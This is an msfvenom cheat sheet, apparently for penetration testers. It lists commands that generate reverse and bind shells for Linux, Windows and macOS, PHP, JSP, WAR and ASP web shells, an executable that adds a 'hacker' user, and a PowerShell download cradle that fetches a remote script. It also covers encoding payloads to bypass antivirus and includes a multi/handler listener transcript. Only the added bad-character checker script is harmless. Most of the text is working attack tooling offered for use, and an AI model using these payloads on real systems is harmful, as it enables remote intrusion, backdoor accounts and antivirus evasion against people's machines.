# MSFVenom

## Basic & Utility Commands

These commands are useful for exploring payloads and options.

| Command | Description |
|---|---|
| `msfvenom -l payloads` | List all available payloads. |
| `msfvenom -l payloads \| grep windows` | Filter the payload list down to Windows payloads. |
| `msfvenom -p <payload> --list-options` | Show options for a specific payload. |
| `msfvenom --list encoders` | List all available encoders. |
## Payload Generation by Target OS

### Linux

| Command | Description |
|---|---|
| `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf` | Linux Meterpreter reverse shell (x86, multi-stage). |
| `msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<IP> LPORT=<PORT> -f elf > shell.elf` | Linux Meterpreter bind shell (x86, multi-stage). |
| `msfvenom -p linux/x64/shell_bind_tcp RHOST=<IP> LPORT=<PORT> -f elf > shell.elf` | Linux bind shell (x64, single-stage). |
| `msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf` | Linux reverse shell (x64, single-stage). |
| `msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh` | Bash reverse shell. |
| `msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py` | Python reverse shell. |
| `msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl` | Perl reverse shell. |
### Windows

| Command | Description |
|---|---|
| `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe` | Windows Meterpreter reverse shell. |
| `msfvenom -p windows/meterpreter/reverse_http LHOST=<IP> LPORT=<PORT> -f exe > shell.exe` | Windows Meterpreter HTTP reverse shell (good for bypassing egress firewalls). |
| `msfvenom -p windows/meterpreter/bind_tcp RHOST=<IP> LPORT=<PORT> -f exe > shell.exe` | Windows Meterpreter bind shell. |
| `msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe` | Windows CMD reverse shell (multi-stage). |
| `msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe` | Windows CMD reverse shell (single-stage, larger file). |
| `msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe` | Creates an executable that adds a user to the local system. |
### macOS

| Command | Description |
|---|---|
| `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho` | macOS reverse shell (x86). |
| `msfvenom -p osx/x86/shell_bind_tcp RHOST=<IP> LPORT=<PORT> -f macho > shell.macho` | macOS bind shell (x86). |
## Web Application & Scripting Payloads

| Command | Description |
|---|---|
| `msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php` | PHP Meterpreter reverse shell (raw output). |
| `msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php` | PHP reverse shell (raw output). |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp` | JSP reverse shell. |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war` | WAR package reverse shell for Tomcat. |
| `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp` | ASP Meterpreter reverse shell. |
| `msfvenom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://<IP>/nishang.ps1')\"" -f python > payload.py` | Python code that executes a PowerShell download cradle. |
## Advanced Techniques: Encoding & Bad Characters

Use these to obfuscate payloads and bypass AV or simple input filters.

| Command | Description |
|---|---|
| `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > shell_encoded.exe` | Encode a payload 5 times with shikata_ga_nai. |
| `msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=process -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"` | Generate C-formatted shellcode, avoiding specific bad characters. |
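Encoders are not guaranteed to remove every byte listed with `-b`, so it is worth verifying the result before using it. The following script is an added example (not part of msfvenom or the Metasploit project): it parses the `unsigned char buf[] = "\x.."` block that `msfvenom -f c` emits and reports the offset of every byte from the bad-character list. The two `-f c` samples embedded below are constructed for the example, not real msfvenom output, and the function names are this script's own.

```python
"""Verify msfvenom -f c output against a -b bad-character list (added example)."""
import re

# Constructed samples in the shape of `msfvenom -f c` output (not real output).
# The first buffer is clean; the second contains a 0x00 and a 0x0a byte.
CLEAN_C_OUTPUT = r'''
unsigned char buf[] =
"\xfc\xe8\x82\x01\x41\x42"
"\x90\xcc\xff\xe4";
'''

DIRTY_C_OUTPUT = r'''
unsigned char buf[] =
"\xfc\x00\x82\x0a\x41\x42"
"\x90\xcc\xff\xe4";
'''


def parse_badchars(spec: str) -> bytes:
    r"""Turn a -b string such as "\x00\x0a\x0d" into the corresponding bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec))


def parse_c_shellcode(text: str) -> bytes:
    r"""Extract the bytes of the `unsigned char buf[] = "..."` block."""
    m = re.search(r'unsigned char buf\[\]\s*=\s*((?:\s*"[^"]*")+)\s*;', text)
    if not m:
        raise ValueError("no C-format shellcode buffer found")
    # msfvenom writes every byte as a \xNN escape, so the -b grammar applies.
    return parse_badchars(m.group(1))


def find_badchars(shellcode: bytes, badchars: bytes) -> dict:
    """Return {bad_byte: [offsets]} for every bad byte present in shellcode."""
    hits = {}
    for offset, b in enumerate(shellcode):
        if b in badchars:
            hits.setdefault(b, []).append(offset)
    return hits


def check_c_output(text: str, badchar_spec: str) -> dict:
    """Parse both inputs and report offending offsets (empty dict means clean)."""
    return find_badchars(parse_c_shellcode(text), parse_badchars(badchar_spec))


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_C_OUTPUT), ("dirty", DIRTY_C_OUTPUT)):
        hits = check_c_output(sample, r"\x00\x0a\x0d")
        if not hits:
            print(f"{label}: no bad characters found")
        for b, offsets in sorted(hits.items()):
            print(f"{label}: bad byte 0x{b:02x} at offsets {offsets}")
```

Redirect the msfvenom command's output to a file and pass its contents to `check_c_output` with the same `-b` string you gave msfvenom; a non-empty result means the encoder (or a too-small `-i` count) left bad bytes in place and the payload needs regenerating.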
## Multi-Handler Listener Configuration

To catch the reverse shells generated above, use the `exploit/multi/handler` module.

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <YOUR_IP>
LHOST => <YOUR_IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
LPORT => <PORT>
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on <YOUR_IP>:<PORT>
```

- `set ExitOnSession false`: keeps the listener running after a session is established, allowing you to catch multiple connections.
- `exploit -j`: runs the handler in the background as a job.
References